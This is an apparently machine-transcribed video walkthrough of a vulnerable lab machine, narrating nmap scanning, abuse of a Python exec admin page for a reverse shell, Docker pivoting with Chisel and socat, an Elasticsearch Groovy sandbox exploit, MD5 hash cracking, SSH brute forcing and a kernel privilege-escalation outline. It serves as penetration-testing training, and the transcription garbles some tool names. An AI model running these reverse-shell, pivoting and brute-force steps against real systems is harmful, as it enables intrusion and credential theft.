Hey, what's up everybody? This is Matzek once again with another video. Today we're gonna be playing Bored Hacker Blog. I think that's the name. Social network. This is like the second version. The last video was the first one, so this is it. And well, as always, we've just ran our nmap scan, tag pn to tell nmap the host is already up and running, tag sv to tell the performance service version detection scan plus a C appended to it to just run some default scripts to each of those, right? For example, HTTP title, it's a default script, right? And like, I don't know, like these kind of versions of our host keys are another script, and so on and so forth. Tag N to disable DNS resolution, dash T5 to speed it up. This is the maximum level inside the tag T option, and all the ports. So we found OpenSSH 6.6 P1 and WorkSook HTTP 2 0.14.1. This is a Python web server, right? So let us just go there and see what's up. Well, we can see here a lot of things. Welcome to the new leave a message social network inside. All the messages are anonymous. Don't worry, it's completely safe and secure. We'll judge that. And we have some messages like hello, testing 1 2 3. This is a cool sign. How do I contact them? First thing I like to do is try some HTML injection, right? So let me just try that. And well, let me check the source code, and it looks like the output is correctly, I mean, it's being properly escaped, right? Like this. So obviously we can try some other or more advanced techniques, like to try to defeat these defenses. For example, try to, well, instead of using this, try encoding it. And I've tried it. I didn't find any vulnerability, but I encourage you to try anyway, like on your own. Search some, I don't know, if you're a bug hunter, you may have some tricks under the hood. So definitely do that, right? In the meantime, we're gonna do this. And I think, well, this is not for the same machine, just a coincidence, but it's fine. So FFUF, this is my preferred tool for fuzzing directories and files. So we'll be using tag C to see a colored output. Tag U for the URL, W for the word list, and let me not use the lowercase one, just the list to medium. That's it, and just 200 threads. And I see to ignore comments, and let us see what's going on here. We already see an admin endpoint. So let us go there right now. And I think there's nothing else actually. So let's just stop this. We can see this. So admin page, code testing page, nothing was ran, input some code to exec. So what this basically is saying is that there's an exec function, like executing whatever we're putting here. That's a possibility. We can try something like this, like, well, ID, and just like that. And it says code not long enough. Let's try something bigger, like, who am I? Right? And something went wrong with running the code. What I like to do now is try to understand how the exec function works in Python, right? Just like that. And I'd open this app. This one too. That should work for us. And here's an example, right? Like proc is equal to this, and then that is being passed to exec. So let me try this. Well, actually, let me open up my payload all the things reverse shell first. I have to use the network adapter while we can, right? So let's just have this load up. And let's go to Python in the meantime. Okay, so let's go back to another network adapter, reload the page, and then try this out. So print sum of whatever, right? And this is going to be passed to the exec. Let's try that. And it says ran the code. That is more promising, right? So I think if we do exec everything, I mean this whole line, it wouldn't work. Okay. Let's try it just for educational purposes. So 192, 168, 56, 101, import 4444. That's it. Let me just do this. Cool. Copy. And let me open my Tmex. And like this. NCMVLP 4444. That's it. And let's send it. And something went wrong. I was already expecting that actually. So cool. Why don't we try to remove this? Huh? Like this hole, it's being passed into the exec. And it's thinking. That's a good idea, right? Look at this. Cool. So I don't know what this happens. This actually doesn't have the script binary, so we cannot normalize it. Even if we like book it, it's like there's no bin bash at all. Note, however, that this isn't anything that impedes us to execute commands. I mean, you could obviously like delete it, but it's just a headache, right? While you can do this, it's exactly the same. So let's just start enumerating. This part of the machine is kind of a headache because as I said, you cannot stabilize your shell, right? So you gotta work like this. And let me just change positions. Now let us cut main.py out. So okay, so the messages are being stored in an array, like message list. Well, an array or a list, Python list. That's the name for Python, right? And it's been rendered to render template. That makes me think, obviously, if you haven't thought about it, that this might be like vulnerable to SSTI, server-side template injection. Again, I've tested that and it didn't work. Maybe I didn't try hard enough. But yeah, you should go and check it out yourself. Okay, so yeah, it's cool. Admin, and look at this, exec. It's being passed like that. It's not being sanitized. It's not being. There is no such like blacklist or allow list for what commands you can run and whatnot. There's nothing at all, right? So this is what we have here, and Docker file. Let me just hostname tag I because that is interesting. And it looks like we're locked in a Docker container, right? We're not in the host machine. Even if we do an ls tag la to the root directory, we will see the Docker env file. We won't see anything in the, it's not here, amp. Let me just check opt. That doesn't even exist. Let me check mount. Let me check, I don't know. Let me check etc cron tab. Probably doesn't exist either. It does not. So cool. What I like to do now is just go ahead and run scan on the whole subnet. I mean, the Docker subnet, right? So for that, obviously we can do that like a one-liner bash script. But we can actually also import, bring a nmap static binary to the machine, and that's what we'll do. Let me check if we want, if we have wget. Let's just download it first. and it's CCS this is, right? So you have an Andrew T static binaries repo on GitHub, and there's a lot of them. Actually, we will be downloading some other tools from this same repo, so we'll not be closing at this for now. Specifically, we will be using Socket, right? So okay, let us okay, it's download. Let me change my network adapter and move it up here. So Matic downloads nmap here. Okay, I don't know, let me just move it to exploits. That's it. So we have an nmap thing, and we do have wget. Look at that. Now since I actually did not see who we are, but we're root, so that's cool. Let me go to root. Okay, root, and let me wget my 192.168.56.101 8000 nmap, right? And here, let me open up my simple server, and there you go. So chmod nmap. Let me run nmap. There you go. And for discovery, actually let me, yep, hostname tag I. So, God, what happened there? Hostname tag I. There you go. Nmap sn 172.1702/24. Use maximum speed. Don't use DNS resolution, and that should be cool. Well, that's great. That shouldn't take much longer. And we do have interesting devices on the network. So we have a 0.1, we're likely us. That's likely us. We have a 0.3 and a 0.2, which it's us. I mean, this is us in the network, and this is us in terms of a loopback address, right? Like the local host address. So the only host that is actually up and running and different from us is this one. Cool. So what about we running a nmap? Well, let's assume it's already open. Let's not run any service version detection scan or default scripts thing, because there's no such libraries inside this machine, so that's useless. Now let me disable DNS resolution T5, and I think that's it. Okay, p tag p. Or actually, let's just go from 1 to 1000. That's what we need. I believe oh, how's that? God. Let me just copy this, add a dot and a slash. There you go. And I believe you should always run a full scan. But in this case, I'm pretty sure that's what we need now, right? And what's going on here? What happened there? All 10,000 scan. Okay, you know what? Let me just run a full scan like this. I will just wait. That's fine. In the meantime, let me, well, we cannot download Socket yet, but we do have a Chisel. Now I need to download Chisel too, because I tried Chisel, well, the one I had downloaded previously, and it didn't work on that machine. When I downloaded it back from the official repo, it worked. So we'll just do that. The thing is that I'm not sure if I switch over to my network adapter, I will be losing it. Like any message I can get from here, so we'll just wait. That's preferably. Yeah. And the bad thing is that since it's not stabilized, it will not allow me to do a Control-C in case it, I don't know, it freezes or something. So what I'm gonna do right now is just go ahead and pause the video, and I'll let you know when I'm done with the Socket and all the stuff. All right, guys. So this scan didn't finish, but oh my god, It's actually still running. We found 2 ports. I stopped it. Well, I wanted to close the window, but I don't know, it's like executing still. But yeah, there are only 2 ports open in this machine: 9300, 9200. I'm not really sure what the 900 3000 is for. I looked it up on Hacktricks, didn't find anything. But the 9200, and we won't see any more like description because there's no default scripts running. We do have a 900 and 9200 pen testing Elasticsearch entry on the Hacktricks website, right? So there's a lot of ways we can start enumerating this. So this is the protocol is HTTP, the one Elasticsearch uses. So we can actually use something like this, right? So let me go ahead and let me actually make sure curl is installed. It's not. So there's a way, if you know, delegate will always like download. Look at that. It will always download the content, the website, whatever you're running. And with this, oh my god, such a headache, dog. Job scale. Let me try this. I don't know. Incredible. Okay, so delegate 172 1702 9200, and we can make this to have the output like being redirected to stdout, standard output, instead of downloaded, right? It's 0.3 and I missed the number here. Oh my god. Sorry for that. And look at that. Okay, so we do have connection, we have interesting information, we have a version number 1.4.2, and we can obviously search, look it up in Searchploit, which is the exploit database utility. Elastic. There you go. Search. Let me just complete it. And we do have my like lower than 1.4.5. This should work. I tried it. Not gonna lie, it didn't work. And we can see this one, for example, with Metasploit. We will not use Metasploit, however, because we do have this. Now, let me inspect it first because there's no version at the beginning. Check X to examine, and you will see, okay, this version, banner, let me look this up on Google just to make sure the CVE is works for version 1.43, 1.42. Okay, look at this. So the Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4. Whatever, always before 1.4.3. That is, we are before that. We're cool. Allows remote attackers to bypass the sandbox protection mechanism and execute commands. So let me try that. Right now we have a problem though. Let me download it with TechIm first, and let me rename it to elastic exploit.py, something like that. Python 3 elastic. Actually, it's using Python 2, and that will work. Cool. We have this, but we do have a problem though. Obviously, we do not have direct access to this container. Why should we do? I mean, there's a lot of things we can do right now. So let us start off with some port forwarding, and I'm gonna be using a Chisel. So for this, you should go to Google and search download Chisel, then go to releases, and let's download the one that says Chisel 177 Linux AMD 64, right? So I've already downloaded. Let me just move it from downloads Chisel here. Let me gun zip Chisel, and now we do have Chisel. Now let me change the name to make it like shorter. Chisel. There you go. So let me head up my HTTP server once again. When I do 68.56.101 8000 Chisel. And let me go back to my network adapter. And there you go. Get request. What happened there? Cool. And chamad plus x Chisel. Fuck. Chamad plus x Chisel, and let us execute it. Chisel, and there you go, it's working. So how does Chisel work? This works on a server client base, right? In our case, we're gonna be the server, Chisel server. That's it. In this case, it's gonna be Chisel client, right? Now we are going to set up a reverse connection on port, whatever port, lead 1337. Now we want from the client to connect back to us in a reverse way, right? So 192.168.56.101, let's specify the port, and this will not be the forwarded port. This is just the tunnel port, all right? With these arguments, we're just executing like the the connection, right? The tunnel. Now we want to send a reverse port forwarding, right? So we need to specify a tag R for reverse. Cool. Now we need to specify the port we want open on our Kali box, which is gonna be I don't know, 9200, just for ease of use. And then we're gonna be specifying the machine we want. Now in case it's a local for forwarding, and in case you and in case you want to forward, like to set up a proxy forward instead of just one or two, you can do this rsucks. This will forward all your ports, right? That will make effectively a proxy connection, and you will be able to communicate to each one of your ports. Now in this case, we do not want that, we don't need it. We just need to a remote port forward. So we want to forward the 9000 from 172.17.0.2, I think it was, and 9000. So 9200. So this is the like the victims port will be forwarding to our local 9200 port, right? Now at the end, this is a good practice because we want to still be able to do some other tasks. We're going to be using the ampersand to background it, right? There you go. It's listening now. Let's connect it. Cool. Now it's connected. And there's a proxy in this. Cool. Basically. So what about we curl in, for example, our HTTP. Let us use silent mode, HTTP 127.0.0.1.9000. And what happened there? Is it not working? Or is there like effectively a port? I'm not really sure now. Maybe just try this. Like 1000 over this. oh, what's going on? Like jobs, it's running on 9,702. It was it like host name I? God, that's wrong. I mean, let us kill it right now. Let's just do from here, okay? Because it was actually the number 3. Cool. So doesn't matter. 9,000 ampersand again, and let me kill our chisel server. Let us spin it up again, like this, and like this. Let's go back now. Whenever your session seems to be hooked, you can just click enter, and there's your like your command line again, right? So let us try the curl thing again, and it should work now. There you go, like that. Okay, so we have now the 9,200 port open in our local machine, pointing to a remote container that is passing at the same time through this one container, like this 0.2, which is the one we have access to, right? So from here, we can do a lot of things, right? Obviously, we want to make sure we read and understand what Elasticsearch is. How we can enumerate it, right? For example, basic user enumeration. Let me try over here. I saw some interesting information because we can try to find indices, right? So let us try that right now, just for a matter of demonstration, right? So what about this? Look at this. We have an index, which is block, right? Some other applications will have more indices, like Kibana, quote, bank. And in order to query them, we just need to like go straight up and like / block, and that's it. And we will see several things. We can use JQ to organize this, like see it prettier. So cool. Let us dump the index now. What about this? Instead of block, and let me do this. Search pretty true. And look at that. We have some useful information. So hits total 1, index block, user Dilbert Brown. We definitely want to jot that down in case we need it to some username brute force or whatever, right? So there you go. So now, feel free to go over all this and just take a look at it. And let me resize this. And what about we now trying to execute this exploit, right? So target is going to be 172. And when we actually use this, you will see it will not work because it's already appended in the 9,200 port. We just need to like set the local hosting, right? So ID root. Apparently we do have command execution. Let me do this. Look at that. LSLA hostname tag I, and we're effectively in the remote container. So we were able to execute this exploit. Now look at this. This is a super important part. For this, we will be using socket, because with socket we can execute a shell relay, and I'm going to be breaking that down for you to understand what that is. And yeah, so we need, I mean, this is a pseudo shell. We cannot move, like we don't need to like the root directory. We go to temp, we cannot, right? Let me go back here. ID again. Cool. So we need to send this shell to another server that has actually direct connection with this one. And I know you know who is that. Exactly. 172.17.02, which is us. right? But again, we could do that, definitely. But this shell is somewhat crappy. As you can see, if we hit Control C or whatever, we'll lose it, so that's not gonna work. Now we can do something different. What about we doing this? We, from the 0.3, from here, from this pseudo shell, we send that reverse shell back to here, and then we relay this connection back to us in our machine. That's a shell relay. That's super fantastic. That's amazing. That's a beautiful concept, in my opinion, right? And we can do that. We can do that with socket. So in the static binaries repo, let's go back to socket. Did I download? No, I haven't downloaded yet. So let me go back and download it. And it's downloaded. Okay. So let me go to exploits, move download socket here, shamal plus a socket, and there you go. Cool. So let me spin a simple HTTP server once again. Okay, and let me download it. 192.168.56.101, 8000 socket. And let me just go back to my network adapter. That's a headache, totally. And cool, we're here. Shamat plus X socket. Yeah, it's working. So look at this. Be super attentive of what I'm gonna do. Okay. First of all, I can create. Prepare. Better word. Let's prepare my relay. What I'm gonna do is socket. Actually, let me try something first. Okay, let me try this. So we are in here. We have access to root. Let me try something. Echo something like this. Bin bash to root, and let's just name whatever x.sh, right? So let me see if we do have it. And no, we don't have. We aren't seeing the output. Okay. We can then do it here, right? Do we have which get? Yes, we do. That's super handy. So bin bash, let me echo to x.sh, cat x.sh. We have it. Coach x.sh. Let me try this once again. ls cat x.sh. Maybe that's a problem here. Let me just say touch x.root x.sh. lsla root. Yes, cool. So what about this? Cat root x.sh. No, it's not working. It doesn't matter. Anyways. Okay, let's go back and cat x.sh. No, that's a problem. Oh my god. Cat x.sh. What's up? lsla cat x.sh rm. Okay. Echo this one. Then bash. Right? Let's send it to x.sh. x.sh again. Cool. And let's echo now the following. Bin bash c bash I diff tcp one. Obviously, remember the 0.3 machine will be sending a reverse shell back to the 0.2 machine, right? So 70 0.2/4444. That's fine. Doesn't matter. And Let me just close them up, and x.sh. Cool. So cat x.sh. There you go. We have our shell. So now that we have it, let me create. Let me see if we have Python. We do. With Python 3, we don't. Which Python 2? Okay, with Python, we're gonna be creating a simple HTTP server on port, whatever. For example, 8083. Let me just background it. Didn't work. Okay, let me just use Python. Cool. Python like this, and background it again. God, simple HTTP server should work. C simple HTTP server. Yeah, I don't know what's going on. Python 2C. Where is it? M? I forgot, man. Yeah, it's M. Like Python 2 M simple HTTP server 8083. Oh my god, I didn't background it. But that's okay. Yeah. But in the meantime, let me just delegate 172.17.0.2 8083 x.sh, and then let's output it to root.x.sh. That's the get request. Let me root. There you go. Shamat plus root x.sh. Let us give it execution permissions. That's good. And we have root. Cool. That's fantastic. So now I need to close this, then to have it again. I'll need to create a chisel forward for the game if it hasn't closed. I don't know, let me just try here. ID. Yes, we have it. Thankfully. So let's go back to root. Let's clear this, because here's where the magic happens. So in order to set up our shell relay, we're going to be using socket, right? So socket will be used like this. Socket TCP-L. Okay, that will say, okay, I'm going to be listening or TCP port, whatever we want. For example, 8000, right? And then whatever connection, message, whatever you want comes into this port, I'm gonna be sending it back to another one over TCP, which is gonna be our IP, right? 101 in port 6666, whatever, right? And in the meantime, in our server, we just need to set up a listener. As easy as that, right? Now, let me just background it now. And now it's listening. What happened there? No, what happened there? I don't know what happened there, bro. Let me try again. Jobs. Cool, he's running. So what about we like executing with bash like this? Oh, it didn't work or what? Okay, you know what? Let me just foreground. Cool. And bash root x.sh. Isn't it send it? 8000. Let me root x.sh. God. Okay. See the problem. Oh my god, I didn't set up correctly. But this is all learning. That's cool. I mean, that's learning, right? Let me send that again. Oh God, what is going on? 444. Let me copy this. Reload it. Here we go. Like this. And this one. Cool. Oh God. Once again, doesn't matter. Jobs. Cool. So again, Hellcat, I'm gonna be listening on port. This one. That was my mistake. 4444. And then I'm gonna be forwarding it to 192.168.56.101 over port 6666. Okay, I'm gonna be doing it like this. It's apparently running. So let me bash root x.sh and look at that. I mean, we just effectively sent a reverse shell to this one, to the 0.2 on port 444, and this forwarded the shell. I mean, it relayed the shell back to us on this listener. So now we're effectively like this. And if we have script, we can obviously stabilize our shell without any trouble. So there you go. Script dev no. Oh my God, it worked. Did it work? Okay, stty row minus echo tag. I mean semicolon for round fg. Reset extern. Export term to extern, and cool, look at that. We do have effectively a shell on the 0.3, which is a remote container, and we didn't have access before, right? Now look at this. I just see something right off the bat, like cat passwords. And look at that, something interesting. I might want to break this, definitely. And for this, I'm going to be using another tool, which is not John the Ripper, but CrackStation. I'm pretty sure some of you guys already know this. Really common tool. It works with rainbow tables. There's a huge database out back there, providing hashes and all this stuff. So we can just go ahead and pass the reCAPTCHA test or check and crack the hashes. Now let's see what's going on. Okay, let me just do this because it's taking all of it. And it looks like MD5, right? So it is allowed by the website and it should work. Let us try. And look at that. All of them, the 5 hashes are publicly available because they're super weak, right? So we can now go ahead, for example, and what I like to do now is, let me just create another window with Demex, that is Control P plus C, and I'm going to be using nano content passwords, which is going to be 1337 hack, 1234 test, 1111 pass, 1234 pass, 1234 Jane. Cool. And now I'm gonna go to content and now users. And let me, well, what was it? Like John, test, Jane, admin, and root. I think there was. So now we can try to root force, right? For example, I like to use a list, which is going to be users, and a word list for password, which is going to be passwords. Now I'm going to be using the 192.168.56.101 as a target. Sorry, 125, I think it was 126 actually. And I'm going to be specifying SSH as a service. I'm going to be using the, well, not necessarily because there are not so many. I'm going to be using F to stop when it finds a valid combination or credentials. I'm gonna be using V for verbose, and that's it. Let's go with that. So it says attacking. Yeah, let me go back to my other network adapter. Now we should be cool. Now look at that. It just tests all of them and it found a valid combination. So John with 1337 hack. That's fantastic. So John, I'm sorry. Well, look at this. SSH John at 192, 168, 56, 126. I'm gonna be saying yes, and I'm gonna be quitting it because I can use SSH pass stack P and 1337 hack, and like this. That way I can be aware what password I'm using. And look at that. We already have access to the actual server, right? I mean, look at this. This is the one we're at. So I like to use very first thing we do as always is sudo 1337 hack. May not use it. Cool, that's fine. Let me see, for example, the bash history. I think there's nothing there, right? Let me find SUIDs. You mount, future mount, SU, PKexec. That's probably vulnerable to Polkit, which will not be exploited because that's not the intended way. Get cap like this. Now let me see. Let's enumerate how many users are in there. We have a John and a Sucknet. Cool. Add etc from tab. There's nothing in there apparently. Let's LA opt temp mount. What else? What else can we do here? Look at that. We can apparently take a look on Sucknet's home folder. I don't see anything interesting. Let me try to type F for file and user Sucknet. Maybe we find something interesting. We don't so far. Let me for ourselves. Let me grab out things like proc, sys, var. Nothing, literally. What else can we do here? I don't remember, actually. Yeah, I cannot run that. We can run limpy, a lot of automated tools in here. Let me check here. Nope. And yes, I already remembered. So yes, I already remembered, and I have bad news because I'm having some trouble with the exploit where we have to use here. If you run limpy, you will find out that we're running a outdated kernel version, right? And you'll see that there are several exploits available for this kernel, such as Dairy Cow, Polkit. Well, Polkit is not related exactly to the kernel. And one of them is overlay fs, if I am not wrong. Now, exploiting it is rather easy, right? I'm gonna be giving you the instructions. So you download the code for exploitdb, for example, which is a trusted source, and you just need to do something like this: gcc overlay fs.c, which is the source code in C, and output and exploit, whatever. Then you upload it here, execute it, run it, and that should give you a shell as root. Now again, I'm having trouble with GCC and some libraries, so I will not be able to do that, to reproduce it, but that's super easy to do. I encourage you to do it, to learn by yourself, learn by doing. That's super important in a pen tester career. So yes, I'm gonna be wrapping up this video here, but I really hope you learn something new. All right. So if you have comments, suggestions, critics, whatever you want, I'm open. I'm open to hear them out. Okay. So yes, thank you very much for joining, and see you later.